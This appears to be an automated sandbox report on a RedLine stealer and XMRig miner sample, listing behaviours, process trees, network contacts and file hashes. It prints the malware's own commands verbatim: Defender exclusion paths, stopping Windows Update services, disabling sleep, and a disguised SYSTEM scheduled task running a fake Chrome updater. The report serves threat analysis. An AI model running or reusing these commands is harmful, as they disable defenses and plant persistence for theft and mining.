Analysis Overview
SHA256
410f6f4b18b743455f7b1b02b7e605cfaf28b58821d5bed2b3f1d387fe13d425
Threat Level: Known bad
The file 3812-127-0x0000000003910000-0x0000000003944000-memory.dmp was found to be: Known bad.
Malicious Activity Summary
RedLine
Redline family
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
XMRig Miner payload
Downloads MZ/PE file
Drops file in Drivers directory
Stops running service(s)
Executes dropped EXE
Loads dropped DLL
Themida packer
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Program crash
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Modifies data under HKEY_USERS
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-12 08:45
Signatures
Redline family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-12 08:45
Reported
2023-08-12 08:47
Platform
win7-20230712-en
Max time kernel
52s
Max time network
148s
Command Line
Signatures
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1824 created 1228 | N/A | C:\Windows\Temp\setup.exe | C:\Windows\Explorer.EXE |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Windows\Temp\setup.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mi.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1984 set thread context of 1976 | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Temp\setup.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\cli.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = … | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
| N/A | N/A | C:\Windows\Temp\setup.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe
"C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe"
C:\Users\Admin\AppData\Local\Temp\mi.exe
"C:\Users\Admin\AppData\Local\Temp\mi.exe"
C:\Users\Admin\AppData\Local\Temp\cli.exe
"C:\Users\Admin\AppData\Local\Temp\cli.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\cc.exe
"C:\Users\Admin\AppData\Local\Temp\cc.exe"
C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 108
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=10094 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7feefa89758,0x7feefa89768,0x7feefa89778
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1092 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=832 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:2
C:\Windows\system32\taskeng.exe
taskeng.exe {4D283B43-C452-426D-BE22-A40709CCA62C} S-1-5-18:NT AUTHORITY\System:Service:
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=10094 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1564 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1916 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2436 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1932 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2588 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2704 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2664 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
Network
| Country | Destination | Domain | Proto |
| PL | 51.83.170.21:19447 | N/A | tcp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.121.70:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 104.85.1.163:80 | www.microsoft.com | tcp |
| NL | 104.85.1.163:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 142.250.179.206:443 | ogs.google.com | tcp |
| DE | 172.217.23.206:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| NL | 142.250.179.150:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.250.179.150:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | stratum-eu.rplant.xyz | udp |
| FR | 141.94.192.217:17056 | stratum-eu.rplant.xyz | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabD29D.tmp
| MD5 | 3ac860860707baaf32469fa7cc7c0192 |
| SHA1 | c33c2acdaba0e6fa41fd2f00f186804722477639 |
| SHA256 | d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904 |
| SHA512 | d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c |
C:\Users\Admin\AppData\Local\Temp\TarD31C.tmp
| MD5 | 4ff65ad929cd9a367680e0e5b1c08166 |
| SHA1 | c0af0d4396bd1f15c45f39d3b849ba444233b3a2 |
| SHA256 | c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6 |
| SHA512 | f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ef0ef461d3c19198780534b20ea4ec7f |
| SHA1 | 2f2bf4b2636b6350278773d54631238968b12347 |
| SHA256 | 5ccdd91fadae8117a39a139b24ddbfb614b60e2328267aa2c07b2df3fbd00afa |
| SHA512 | 17ad28fc73f79bec79dac5dbace5e47e57f98f438e9093a74a95a97e7b04c1ddc411eea0b554dc68d4bda582128d7ac4fda91931f50e7b48b16525ee1835313d |
C:\Users\Admin\AppData\Local\Temp\mi.exe
| MD5 | aba23d7f60f40f4dee64fa440d5db6e6 |
| SHA1 | dde62462dc7887a6b3ba193eafb50da17ef40e67 |
| SHA256 | 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6 |
| SHA512 | ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40 |
C:\Users\Admin\AppData\Local\Temp\cli.exe
| MD5 | b78141a544759e1a07740aa28b35584c |
| SHA1 | af95ccd7d12c7ed7bdc6782373302118d2ebe3a8 |
| SHA256 | e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d |
| SHA512 | 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959 |
C:\Users\Admin\AppData\Local\Temp\cc.exe
| MD5 | 858f82fe9166c34b6709a3adfe6a625f |
| SHA1 | 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5 |
| SHA256 | 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28 |
| SHA512 | 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e |
C:\Windows\Temp\setup.exe
| MD5 | bc202c47461acbe8bef80e143eb3a364 |
| SHA1 | 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634 |
| SHA256 | df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb |
| SHA512 | 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08 |
\Windows\Temp\setup.exe
| MD5 | bc202c47461acbe8bef80e143eb3a364 |
| SHA1 | 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634 |
| SHA256 | df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb |
| SHA512 | 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08 |
memory/2792-157-0x00000000744A0000-0x0000000074B8E000-memory.dmp
C:\Windows\Temp\setup.exe
| MD5 | bc202c47461acbe8bef80e143eb3a364 |
| SHA1 | 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634 |
| SHA256 | df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb |
| SHA512 | 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08 |
memory/548-164-0x0000000004450000-0x00000000056B5000-memory.dmp
memory/1668-166-0x00000000774D0000-0x00000000774D2000-memory.dmp
memory/1824-165-0x000000013F540000-0x00000001407A5000-memory.dmp
memory/1824-167-0x00000000772E0000-0x0000000077489000-memory.dmp
memory/1824-169-0x000000013F540000-0x00000001407A5000-memory.dmp
memory/1824-170-0x000000013F540000-0x00000001407A5000-memory.dmp
memory/1824-168-0x000000013F540000-0x00000001407A5000-memory.dmp
memory/1824-171-0x000000013F540000-0x00000001407A5000-memory.dmp
memory/1824-172-0x000000013F540000-0x00000001407A5000-memory.dmp
memory/1668-173-0x0000000000150000-0x00000000001C0000-memory.dmp
memory/1976-174-0x0000000000400000-0x0000000000527000-memory.dmp
memory/1976-182-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/1668-184-0x0000000002F90000-0x0000000002FD0000-memory.dmp
memory/1668-177-0x0000000074420000-0x0000000074B0E000-memory.dmp
memory/1976-175-0x0000000000400000-0x0000000000527000-memory.dmp
memory/1976-185-0x0000000000400000-0x0000000000527000-memory.dmp
memory/1668-186-0x0000000002FD0000-0x000000000303C000-memory.dmp
\Users\Admin\AppData\Local\Temp\cli.exe
| MD5 | b78141a544759e1a07740aa28b35584c |
| SHA1 | af95ccd7d12c7ed7bdc6782373302118d2ebe3a8 |
| SHA256 | e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d |
| SHA512 | 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959 |
memory/1976-187-0x0000000000400000-0x0000000000527000-memory.dmp
memory/1668-191-0x0000000000B10000-0x0000000001144000-memory.dmp
memory/1976-192-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1984-188-0x0000000001230000-0x00000000014BB000-memory.dmp
memory/1976-194-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-195-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1824-193-0x000000013F540000-0x00000001407A5000-memory.dmp
memory/1976-196-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1668-198-0x0000000002F90000-0x0000000002FD0000-memory.dmp
memory/1976-197-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-199-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-200-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-201-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-202-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-203-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-204-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-205-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-206-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-207-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-209-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/548-208-0x0000000004450000-0x00000000056B5000-memory.dmp
memory/1976-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1668-211-0x0000000002F90000-0x0000000002FD0000-memory.dmp
memory/1976-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1824-220-0x00000000772E0000-0x0000000077489000-memory.dmp
memory/1976-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
memory/1976-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp
